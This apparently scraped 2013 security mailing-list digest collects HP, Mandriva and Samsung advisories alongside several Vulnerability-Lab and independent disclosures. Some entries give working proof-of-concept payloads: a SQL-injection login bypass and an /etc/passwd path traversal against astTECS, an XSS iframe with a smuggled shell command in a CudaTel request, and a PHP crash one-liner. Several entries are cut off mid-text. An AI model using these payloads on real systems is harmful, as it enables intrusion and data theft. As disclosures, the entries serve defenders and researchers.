[security bulletin] HPSBGN02882 rev.1 - HP Database and Middleware Automation (DMA) using SSL, Remote Disclosure of Information
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03788014 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03788014 Version: 1 HPSBGN02882 rev.1 - HP Database and Middleware Automation (DMA) using SSL, Remote Disclosure of Information NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-16 Last Updated: 2013-07-16 Potential Security Impact: Remote disclosure of information Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP Database and Middleware Automation (DMA) using SSL (Secure Sockets Layer). The vulnerability could be remotely exploited resulting in disclosure of information. References: CVE-2013-2365 (SSRT101215) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Database and Middleware Automation (DMA ) v10.0 and v10.01. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-2365(AV:A/AC:M/Au:N/C:C/I:C/A:C) 7.9 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following software update available to resolve the vulnerability. HP Database and Middleware Automation (DMA ) v10.10 or subsequent available from HP Live Network and HP Software Support Online. DMA v10.10 allows configuration of the SSL (Secure Sockets Layer) based communication between the DMA client and the DMA server. Customers need to upgrade to DMA v10.10 following the installation documentation included with the DMA v10.10 software update. Please refer to the DMA v10.10 Release Notes for detailed upgrade instructions. HISTORY Version:1 (rev.1) - 16 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlHlqvIACgkQ4B86/C0qfVnZvQCaA0uMRPbPmfHIYIBDVBGacttK vDwAn3G6RGcG5QsQwHn8YmkgUAyDEBw4 =IaEA -END PGP SIGNATURE-
[security bulletin] HPSBMU02870 SSRT101012 rev.2 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03747342 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03747342 Version: 2 HPSBMU02870 SSRT101012 rev.2 - HP Network Node Manager I (NNMi) for HP-UX, Linux, Solaris, and Windows, Remote Unauthorized Access NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-10 Last Updated: 2013-07-16 Potential Security Impact: Remote unauthorized access. Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Apotential security vulnerability has been identified with HP Network Node Manager I (NNMi) on HP-UX, Linux, Solaris, and Windows. The vulnerability could be remotely exploited resulting in unauthorized access. References: CVE-2013-2351 (SSRT101012, ZDI-CAN-1566) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Network Node Manager I (NNMi) v9.00, v9.1X and v9.2X for HP-UX, Linux, Solaris, and Windows. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-2351(AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks e6af8de8b1d4b2b6d5ba2610cbf9cd38 for working with HP's Zero Day Initiative, which reported these vulnerabilities to security-al...@hp.com. RESOLUTION HP has made patches and hotfixes available to resolve this vulnerability for NNMi v9.00, v9.1X, and v9.2X. For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. NNMi Version Platform / Required Patch Level Hotfix 9.00 Linux NNM900L_5 Solaris NNM900S_5 Windows NNM900W_5 HP-UX PHSS_42328 Note: See Product Specific Information below. HF-NNMI-9.0XP5-NNMCONTENT-20130612 9.10 Linux NNM910L_5 Solaris NNM910S_5 Windows NNM910W_5 HP-UX PHSS_43078 Note: See Product Specific Information below. HF-NNMI-9.1XP5-NNMCONTENT-20130417 9.2X Linux NNM920L_3 Solaris NNM920S_3 Windows NNM920W_3 HP-UX PHSS_43408 Note: See Product Specific Information below. Note: The hotfix must be installed after the required patch. The hotfix must be reinstalled if the required patch is reinstalled. MANUAL ACTIONS: Yes - NonUpdate Install the applicable patch and hotfix. PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa The following text is for use by the HP-UX Software Assistant. AFFECTED VERSIONS For HP-UX NNMi v9.2X HP-UX B.11.31 = HPOvNNM.HPOVNMSAS HPOvNnmSiteScope.HPOVNNMSITESCOPE HPOvNNM.HPNNMTRAPSV HPOvNNM.HPOVNNMNA HPOvNNM.HPOVNNMINSTALL HPOvNNM.HPOVNNMAS HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.HPOVNNMUI HPOvNNM.HPNMSCLUSTER HPOvNNM.HPOVNMSSNMPCO HPOvNNM.HPNMSCOMPS HPOvNNM.HPOVNMSHA HPOvNNM.HPOVSNMP HPOvNNM.HPOVNMSCAUSESV HPOvNNM.HPOVSTPLR HPOvNNM.HPOVNNMSIM HPOvNNM.HPOVNNMNC HPOvNNM.HPNMSCUSTPOLL HPOvNNM.HPOVNNMCISCO HPOvNNM.HPOVNNMNB HPOvNNM.HPOVNNMOM HPOvNNM.HPOVNNMUCMDB HPOvNNM.HPOVNMSSPMD HPOvNNM.HPOVPERFSPIADA HPOvNNM.HPOVNMSLIC HPOvNnmRams.HPOVNNMRAMS HPOvNNM.HPOVNMSSPICOM HPOvNNM.HPNMSDEVEXTN HPOvNNM.HPOVNMSEVTPSV HPOvNNM.HPOVNNMBSM HPOvNNM.HPOVNMSDISCOSV HPOvNNM.HPOVNMSRBA HPOvNNM.HPOVNMSASSHARED HPOvNNM.HPOVNMSCONFIG HPOvNNM.HPOVNNMGEN HPOvNNM.HPOVNMSCOMMON action: install patch PHSS_43408 or subsequent For HP-UX NNMi v9.1X HP-UX B.11.31 = HPOvNNM.HPOVNMSCAUSESV HPOvNNM.HPOVNMSDISCOSV HPOvNNM.HPOVICMP HPOvNNM.HPOVNMSCONFIG HPOvNNM.HPOVNNMCISCO HPOvNNM.HPOVNNMOM HPOvNNM.HPNMSCLUSTER HPOvNNM.HPOVNMSEMBDDB HPOvNNM.HPNMSDEVEXTN HPOvNNM.HPOVNNMBSM HPOvNNM.HPNNMTRAPSV HPOvNNM.HPOVNMSHA HPOvNnmSiteScope.HPOVNNMSITESCOPE HPOvNNM.HPOVNMSEVTPSV HPOvNNM.HPOVSTPLR HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.HPOVNMSISPINET HPOvNNM.HPNMSCOMPS HPOvNNM.HPOVNNMINSTALL HPOvNNM.HPOVNMSSNMPCO HPOvNNM.HPNMSJBOSS HPOvNNM.HPOVNMSSPMD HPOvNNM.HPOVNNMNC HPOvNNM.HPOVNNMNA HPOvNNM.HPOVNMSLIC HPOvNNM.HPOVNNMSIM HPOvNNM.HPOVNNMNB HPOvNNM.HPOVNNMUCMDB HPOvNNM.HPOVNMSSPICOM HPOvNNM.HPOVSNMP HPOvNNM.HPOVNNMBAC HPOvNnmRams.HPOVNNMRAMS HPOvNNM.HPOVNMSCOMMON HPOvNNM.HPOVNNMGEN HPOvNNM.HPOVNNMUI HPOvNNM.HPOVNMSRBA HPOvNNM.HPOVPERFSPIADA HPOvNNM.HPNMSCUSTPOLL action: install patch PHSS_43078 or subsequent For HP-UX NNMi v9.00 HP-UX B.11.31 = HPOvNNM.HPOVICMP HPOvNNM.HPOVNNMBSM HPOvNNM.HPOVNMSCUSTCORR HPOvNNM.
Voice Logger astTECS - bypass login & arbitrary file download
Author: Michal Blaszczak Website: http://blaszczakm.blogspot.com Project: hack voip - http://blaszczakm.blogspot.com/search/label/hack%20voip Date: 16.07.2013 Voice Logger - VoIP software for Call Center 1) bypass login login: admin' or 1='1 password: admin line: 168 file: manager_login.server.php 2) arbitrary file download http://192.168.15.145/poligon/asttecs/records1.php?file=/etc/passwd linie: 2 file:records.php http://192.168.15.145/poligon/asttecs/records.php?file=/etc/passwd linie: 2 file:records.php 3) and other security bugs Michał Błaszczak http://blaszczakm.blogspot.com
[CVE-2013-4763|CVE-2013-4764] Vulnerability in built-in system app of Samsung Galaxy S3/S4
Hi list, I would like to inform you that the details of the vulnerability in built-in system app of Samsung Galaxy S3/S4 (assigned as CVE-2013-4763 and CVE-2013-4764) are now disclosed to public. In Samsung Galaxy S3/S4, a pre-loaded app, i.e., sCloudBackupProvider.apk, is used to provide backup functionality for the users, and it unintentially exposes several unprotected components. By exploiting these unprotected components, an unprivileged app can trigger a so-called “restore” operation to write SMS messages back to the standard SMS database file (mmssms.db) used by the system messaging app, i.e., SecMms.apk. As a result, a smishing attack can effectively create and inject arbitrary (fake) SMS text messages. Similarly, fake MMS messages and call logs are also possible. This vulnerability has been disclosed in CVE-2013-4763. Also, these components can be sequentially triggered in a specific order to create arbitrary SMS content, inject to system-wide SMS database, and then trigger the built-in SMS-sending behavior (to arbitrary destination). This vulnerability has been disclosed in CVE-2013-4764. QIHU Inc. discovered these vulnerability and informed Samsung Corp. in June 10, 2013. Samsung confirmed the vulerability and is now preparing an OTA update. As a temporary workaround, disable the sCloudBackupProvider.apk app would help block known attack vectors. Details of CVE-2013-4763 and CVE-2013-4764 can be also found in QIHU Inc.'s official site: http://shouji.360.cn/securityReportlist/CVE-2013-4763.html http://shouji.360.cn/securityReportlist/CVE-2013-4764.html Regards, Z.X. from QIHU Inc.
Re: [ MDVSA-2013:195 ] php
Hey guys, Related to this I´ve found a proof of concept test script: php -r 'xml_parse_into_struct(xml_ parser_create_ns(), str_repeat("", 1000), $b);' Gabe twitter: @gmaggiotti On Mon, Jul 15, 2013 at 3:41 AM, wrote: > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > ___ > > Mandriva Linux Security Advisory MDVSA-2013:195 > http://www.mandriva.com/en/support/security/ > ___ > > Package : php > Date: July 12, 2013 > Affected: Business Server 1.0, Enterprise Server 5.0 > ___ > > Problem Description: > > A vulnerability has been discovered and corrected in php: > > * Fixed PHP bug #65236 (heap corruption in xml parser) (CVE-2013-4113). > > The updated packages have been upgraded to the 5.3.27 version which > is not vulnerable to this issue. > > The php-timezonedb package has been updated to the 2013.4 version. > > Additionally, some packages which requires so has been rebuilt for > php-5.3.27. > ___ > > References: > > http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4113 > http://www.php.net/ChangeLog-5.php#5.3.27 > ___ > > Updated Packages: > > Mandriva Enterprise Server 5: > b600e684742020a5f0cc6cab7712a5a2 > mes5/i586/apache-mod_php-5.3.27-0.1mdvmes5.2.i586.rpm > 8c6d7ecbcd19741d6f359ace12986dc0 > mes5/i586/libphp5_common5-5.3.27-0.1mdvmes5.2.i586.rpm > caccd5c4e63ec27c2f87a8dd6483b771 > mes5/i586/php-apc-3.1.13-0.5mdvmes5.2.i586.rpm > 1ce4a19b3f4156c1bc6ae6486cb409ed > mes5/i586/php-apc-admin-3.1.13-0.5mdvmes5.2.i586.rpm > d0ee0ab323ba74bb4838bfd773fa4170 > mes5/i586/php-bcmath-5.3.27-0.1mdvmes5.2.i586.rpm > ba2b58c17989f7e14baec639d1a5f5e0 > mes5/i586/php-bz2-5.3.27-0.1mdvmes5.2.i586.rpm > 14429e2eefef79177a9965d436843644 > mes5/i586/php-calendar-5.3.27-0.1mdvmes5.2.i586.rpm > d983c7e358d07b8d278f6482144b84dc > mes5/i586/php-cgi-5.3.27-0.1mdvmes5.2.i586.rpm > d0f9b4981112bfa8429b8d512953ec36 > mes5/i586/php-cli-5.3.27-0.1mdvmes5.2.i586.rpm > 067421d3601521fc88e0e5ea81905749 > mes5/i586/php-ctype-5.3.27-0.1mdvmes5.2.i586.rpm > fbc030238f172de2816079683fa2d403 > mes5/i586/php-curl-5.3.27-0.1mdvmes5.2.i586.rpm > a40b2b3198f2c3a7533fc293f6b3c1c5 > mes5/i586/php-dba-5.3.27-0.1mdvmes5.2.i586.rpm > 1703ce9efd667a253e8dc5bcac40e479 > mes5/i586/php-devel-5.3.27-0.1mdvmes5.2.i586.rpm > 328111ececd3f9c80c2b0fe1717bdb50 > mes5/i586/php-doc-5.3.27-0.1mdvmes5.2.i586.rpm > 53835cfb06f14655b2dbbd8b72907b20 > mes5/i586/php-dom-5.3.27-0.1mdvmes5.2.i586.rpm > 62aafcf0c1bcdf58567b341365957039 > mes5/i586/php-eaccelerator-0.9.6.1-0.11mdvmes5.2.i586.rpm > c61d2f2752af5056852b067c8b0b6ebd > mes5/i586/php-eaccelerator-admin-0.9.6.1-0.11mdvmes5.2.i586.rpm > ef4af2387b2520b65087d884d0c12374 > mes5/i586/php-enchant-5.3.27-0.1mdvmes5.2.i586.rpm > 4b9f60ba95d7ab43207ad9119dfa50a4 > mes5/i586/php-exif-5.3.27-0.1mdvmes5.2.i586.rpm > 9102ecabb9ea1f45f63b373cb339 > mes5/i586/php-fileinfo-5.3.27-0.1mdvmes5.2.i586.rpm > eb8f5b55a16a394c34fe77f6e401a518 > mes5/i586/php-filter-5.3.27-0.1mdvmes5.2.i586.rpm > 52531ad0e8663500c7d1c220dabae52e > mes5/i586/php-fpm-5.3.27-0.1mdvmes5.2.i586.rpm > b6e720e32592416025d40a0d17232467 > mes5/i586/php-ftp-5.3.27-0.1mdvmes5.2.i586.rpm > 6fd1398953fd88149f95aca44641749f > mes5/i586/php-gd-5.3.27-0.1mdvmes5.2.i586.rpm > 47ff6b25c0c4867fb1c1493d0951150e > mes5/i586/php-gd-bundled-5.3.27-0.1mdvmes5.2.i586.rpm > 38cce97a1a62fbd14b189f2d2aaace42 > mes5/i586/php-gettext-5.3.27-0.1mdvmes5.2.i586.rpm > 7fa398db7247a32cff766fb4f9aca846 > mes5/i586/php-gmp-5.3.27-0.1mdvmes5.2.i586.rpm > abab206fc2c06ced553af47fe2149953 > mes5/i586/php-hash-5.3.27-0.1mdvmes5.2.i586.rpm > e9bd5f23725646e59493fcb883ba5402 > mes5/i586/php-iconv-5.3.27-0.1mdvmes5.2.i586.rpm > ccbe8aa26af20a2ec8da04fc7ea271cb > mes5/i586/php-imap-5.3.27-0.1mdvmes5.2.i586.rpm > 0c06723e63d034f864cc5163292a1ae0 > mes5/i586/php-ini-5.3.27-0.1mdvmes5.2.i586.rpm > 6444a4e3da67e4a3402b12e50da96dc4 > mes5/i586/php-intl-5.3.27-0.1mdvmes5.2.i586.rpm > feefc0cd26fe0600c438a83963ebe419 > mes5/i586/php-json-5.3.27-0.1mdvmes5.2.i586.rpm > 5e5f91e47deccf2c3ca41986c44f92a6 > mes5/i586/php-ldap-5.3.27-0.1mdvmes5.2.i586.rpm > 59e192ad5a76e9e10252fed81cb24b2d > mes5/i586/php-mbstring-5.3.27-0.1mdvmes5.2.i586.rpm > c1af9e1ae6f4abda2ef0669eb983c6af > mes5/i586/php-mcrypt-5.3.27-0.1mdvmes5.2.i586.rpm > 71e8b3bc20551353f4a5e7b74761e4ba > mes5/i586/php-mssql-5.3.27-0.1mdvmes5.2.i586.rpm > 63ec2927731362b746f6f77862df65e3 > mes5/i586/php-mysql-5.3.27-0.1mdvmes5.2.i586.rpm > 759104a8ca48a4038a7668463fdd41df > mes5/i586/php-mysqli-5.3.27-0.1mdvmes5.2.i586.rpm
Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities
Title: == Olive File Manager v1.0.1 iOS - Multiple Vulnerabilities Date: = 2013-07-13 References: === http://www.vulnerability-lab.com/get_content.php?id=1009 VL-ID: = 1009 Common Vulnerability Scoring System: 5.6 Introduction: = A powerful file manager and well-designed office suit. Multiple features all in one app, coming with new functions every 2 weeks! These are all in Olive File Manager! Once you have it, ask for nothing else! Powerful file manager: Retain your use habits with PC file manager such as copy and paste. Capable of opening documents like mail attachments from other apps. Support for multiple display mode(e.g. list, thumbnail, grid), sending documents as mail attachments, screening display, sorting and searching documents, etc. A wireless USB flash disk A compressing & decompressing tool An encrypted safe box An e-book reader A GoogleDocs terminal A Dropbox terminal A picture viewer A music player A video player Office Suite: Multiple formats supports available, including doc, docs, xls, xlsx, ppt, pptx, pdf, txt, rtf, html, iwork, etc. Wireless USB flash disk: This enables you to transfer your files from your USB disk to your iPad through WIFI. Compressing & decompressing: Support for decompression and package compression for .zip and .rar files. Encrypted safe box: You can set a password on your Olive File Manager and never need to worry about your documents being exposed when someone is playing your iPad. Cloud: GoogleDocs and Dropbox supports are available with the function of synchronous upload and download of files(More Cloud supports are under development). Picture Viewer: Support for common image formats such as .png, .bmp and .jpg. Music & Video Player: Support for common video formats including MP3, AAC, 3GP, avi, au, wav, MP4, mov and m4a (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/olive-file-manager/id529493702 ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). Report-Timeline: 2013-07-13:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Apple AppStore Product: Olive File Manager Wifi 1.0.1 Exploitation-Technique: === Remote Severity: = High Details: 1.1 A local file include and arbitrary file upload web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The vulnerability allows remote attackers to upload files via POST method with multiple extensions to unauthorized access them on application-side of the service. The vulnerability is located in the file upload/add module of the web-server (http://localhost:8797/) when processing to request a manipulated filename via POST. The injected file will be accessable via the index listing module of the web application. Remote attackers can exchange the filename with a double or tripple extension bia POST method to bypass the upload validation and filter process. After the upload the attacker access the file with one extension and exchange it with the other one to execute for example php codes. A persistent script code injection is detected in the filename parameter. Attackers can tamper the request and exchange the file name with persistent malicious script code or tags. The code will be executed in the main index site when processing to list the object (file) items. Attackers are also able to inject persistent code with local frame requests to unauthorized access application data/apps or restricted application information. The execution of the persistent code also occurs when an application user is processing to refresh, update or delete the malicious web context. Exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard). Successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. Vulnerable Application(s): [+] Olive File Manager v1.0.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] File Upload (Web Server) [Remote] Vulnerable File(s): [+] AirDriveAction_file_add Vulnerable Parameter(s): [+] filename Affected Module(s): [+] Application Index File Listing (http://localhost:8797/) 1.2 A persistent input validation web vulnerability is detected in the Olive File Manager v1.0.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app. The vulnerability is loc
Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities
Title: == Dell Kace 1000 SMA v5.4.70402 - Persistent Vulnerabilities Date: = 2013-07-16 References: === http://www.vulnerability-lab.com/get_content.php?id=833 VL-ID: = 833 Common Vulnerability Scoring System: 3.5 Introduction: = Dell KACE is to provide an appliance-based approach to systems management, to create time for systems administration professionals, while saving money for their companies. Dell KACE Systems Management Appliances are available as both physical and virtual appliances. The KACE Management Appliance delivers a fully integrated systems management solution, unlike traditional software approaches that can require complex and time-consuming deployment and maintenance. KACE accomplishes this via an extremely flexible, intelligent appliance-based architecture that typically deploys in days and is self maintaining. The KACE Management Appliance also provides direct access to time-saving ITNinja systems management community information using AppDeploy Live, the leading destination for end point administrators. The result: Comprehensive systems management that is easy-to-use and that can be more economical than software only alternatives. Read more in the white paper KACE K1000 Management Appliance Architecture: Harnessing the Power of an Appliance-based Architecture. The KACE Management Appliance is designed for enterprises and business units with up to 20,000 nodes. (Copy of the Vendor Homepage: http://www.kace.com/products/systems-management-appliance ) Abstract: = The Vulnerability Laboratory Research Team discovered a web session vulnerability in Dell Kace K1000, Systems Management Appliance. Report-Timeline: 2013-01-24: Researcher Notification & Coordination 2013-02-06: Vendor Notification 2013-02-08: Vendor Response/Feedback 2013-**-**: Vendor Fix/Patch 2013-07-16: Public Disclosure Status: Published Affected Products: == DELL Product: Kace K1000 SMA 5.4.70402 Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation web vulnerabilities are detected in Dell Kace K1000, Systems Management Appliance. The vulnerabilityallows an attacker to inject own malicious script code in the vulnerable module on application side (persistent). The first vulnerability is located in the `Inventory` module with the bound vulnerable Ip-address, Mac, Os Name, Service pack, Notes and Label Name parameters. The persistent injected script code will be executed directly out of the `Computer` listing when processing to manage the earlier inserted machines in dbms context. The second vulnerability is located in the `Distribution` module with the bound vulnerable Machine Name and Mac address parameters. The persistent injected script code will be executed directly out of the `Walk-on-lan` exception handling mechanism when a malicious data is inserted in the vulnerable fields. Successful exploitation of the vulnerabilities result in persistent session hijacking, persistent phishing, persistent external redirects, persistent external malware loads via inject and persistent vulnerable module web context manipulation. Vulnerable Section(s): [+] Inventory => Computers [+] Inventory => Computers [+] Distribution => Wake-on-lan Vulnerable Module(s): [+] Add New Item [+] Add Label [+] Add new Item Vulnerable Parameter(s): [+] [Ip-address] [Mac] [Os Name] [Service pack] [Notes] [+] [Label Name] [+] [Machine Name] [Mac address] Affected Modules(s): [+] Inventory => Computers [+] Inventory => Computers => Choose Action Menu => Apply label [+] Distribution => Wake-on-lan =>Exception handeling Proof of Concept: = The vulnerability can be exploited by remote attackers with low user interaction and low privilege application user account. For demonstration or reproduce ... 1.1 URL: https://pub23.127.0.0.1:1336/adminui/machine.php?ID=1 Affected Module: Inventory => Computers Code Review: // this will get set at the end of the page, after we've generated all the dynamic sections var gLastSectionId = 0; [Expand All] [Printer Friendly Version] [Show All History] Summary Name:Name Manual Entry:Manually Entered Record, no communication with the server [Edit] IP Address:[PERSISTENT INJECTED SCRIPT CODE!] Action...Action 1 MAC:[PERSISTENT INJECTED SCRIPT C
Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability
Title: == Barracuda CudaTel 2.6.02.040 - Client Side Cross Site Scripting Vulnerability Date: = 2013-07-15 References: === http://www.vulnerability-lab.com/get_content.php?id=776 BARRACUDA NETWORK SECURITY ID: BNSEC-807 VL-ID: = 776 Common Vulnerability Scoring System: 2.1 Introduction: = Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: = The Vulnerability Laboratory Research Team discovered a client side web vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: 2012-11-26: Researcher Notification & Coordination 2012-11-27: Vendor Notification 2012-12-01: Vendor Response/Feedback 2013-04-03: Vendor Fix/Patch 2012-07-15: Public Disclosure Status: Published Affected Products: == Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: === Remote Severity: = Medium Details: A client side input validation vulnerability is detected in Barracuda Networks CudaTel v2.6.002.040 appliance application. The non-persistent vulnerability allows remote attackers to manipulate website links to provoke malicious client side (application-side) requests. The secound vulnerability (client side) is located in the `error:Internal Error` exception handling. When remote attackers provoke to load an invalid request the exception-handling will display the earlier inserted bbx_hostname (malicious) web context (exp. script codes). The attacker can use the vulnerable bbx_backup_site_host parameter of the test connection listing module to provoke an evil application exception-handling request. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or evil websites. Exploitation of the vulnerability requires medium application user interaction. Vulnerable Section(s): [+] Test - Connection Vulnerable Module(s): [+] Exception-handling [Internal Error] - Listing Vulnerable Parameter(s): [+] bbx_backup_site_host Proof of Concept: = The vulnerability can be exploited by remote attackers with low or medium required user interaction and without privileged application user account. For demonstration or reproduce ... Review: Exception-handling [Internal Error] - Listing [bbx_backup_site_host] --- error: "Internal error.\n[backup] Can't connect to >\"http://vuln-lab.com/?content-type=text/html";>http://vuln-lab.com>" PoC: http://cudatel.ptest.cudasvc.com/gui/backup/test ?_=1353975862209&bbx_backup_site_id=2&bbx_backup_site_type=ftp &bbx_backup_site_host=%3E%22%3Ciframe%20src=http://vulnerability-lab.com%3E&bbx_backup_site_port=8&bbx_backup_site_user=BENJAMINKM &bbx_backup_site_path=%2F+%26+echo+%3E+%2Fdata%2Fsounds%2Fmusic%2F8%2F2a10577f-6764-4368-8571-44d42e4695ff Solution: = The vulnerability can be patched by parsing the vulnerable bbx_backup_site_host parameter request. Parse the internal error exception-handling when processing to display the error string of the requested parameter. (error context) 2013-04-03: Vendor Fix/Patch Note: Barracuda Networks provided a download in the customer section but also automatic update to patch the issue in the appliance series. Risk: = The security risk of the client side input validation vulnerability is estimated as medium(-) because of the main location in the exception-handling. Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merch
FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability
Title: == FTP Sprite v1.2.1 iOS - Persistent Web Vulnerability Date: = 2013-07-12 References: === http://www.vulnerability-lab.com/get_content.php?id=1007 VL-ID: = 1007 Common Vulnerability Scoring System: 3.7 Introduction: = FTP Sprite can turn your iPhone, ipad, ipod into ftp client, download files from ftp server and upload files into ftp server. ** FTP Action ** Add, modify, delete ftp server ** Download multiple files/folder Supported ** Upload multiple files/folder Supported ** Living progress ** View files online ** Create folder online ** Download and upload history ** Sorting by file name, create date and file size ** Local File Sharing ** USB File Sharing via iTunes ** Http File Sharing via WiFi,Support Safari, chrome, firefox and IE6/7/8/9 ** Chrome and Firefox Supported upload multiple files ** Email multiple files/folder Supported ** Open files using other applications ** Local File Manage ** New Folder ** Sorting by file name, create date and file type ** View, copy, move, delete, rename, email, zip Compression and unzip files/folders ** Glide deleting function ** Select all and Cancel all ** Photo import Supported ** Bookmark supported ** File View ** New plain text(default encoding UTF-8),Convert plain file encoding (Unicode,UTF-8 etc) [.txt] ** External file content copy or paste ** Photo View, Zoom [.png .jpg .jpeg .gif .bmp .xbm .tif .tiff etc]; ** Document reader [.pdf .rtf .csv .rtfd .doc .docx .xls .xlsx .ppt .pptx (office 2003 or later) etc] ** Video Player [.mp4] ** File Compression and Decompression [.zip .rar] ** Extract files from encryption .rar ** Multi-touch Supported, Zoom files ** Landscape mode supported ** iPad-compatible (Copy of the Vendor Homepage: https://itunes.apple.com/de/app/ftp-sprite+/id480523641 ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone). Report-Timeline: 2013-07-12:Public Disclosure (Vulnerability Laboratory) Status: Published Affected Products: == Apple AppStore Product: FTP Sprite - Application 1.2.1 Exploitation-Technique: === Remote Severity: = Medium Details: A persistent input validation web vulnerability is detected in the FTP Sprite 1.2.1 application (Apple iOS - iPad & iPhone). The bug allows an attacker (remote) to implement/inject malicious script code on the application side (persistent) of the app. The vulnerability is located in the index file dir listing module of the web-server (http://localhost:41495) when processing to display via POST request method injected manipulated `folder names`. The persistent script code will be executed in the main index file dir listing module when the service lists the new malicious injected foldername as item. Exploitation of the persistent web vulnerability requires low or medium user interaction without application user account. Successful exploitation of the vulnerability can lead to persistent session hijacking (customers), account steal via persistent web attacks, persistent phishing or stable (persistent) certificate mail notification context manipulation. Vulnerable Application(s): [+] FTP Sprite v1.2.1 - ITunes or AppStore (Apple) Vulnerable Module(s): [+] Add Folder Vulnerable Parameter(s): [+] foldername Affected Module(s): [+] Index Folder Listing Proof of Concept: = The persistent input validation web vulnerability can be exploited by remote attackers without privilege application user account and with low user interaction. For demonstration or reproduce ... PoC: Add Folder - (Name) 0% NameSizeModified Date Delete 2013-07-11 20:14:33 --- Request Session Log --- Status: 200[OK] POST 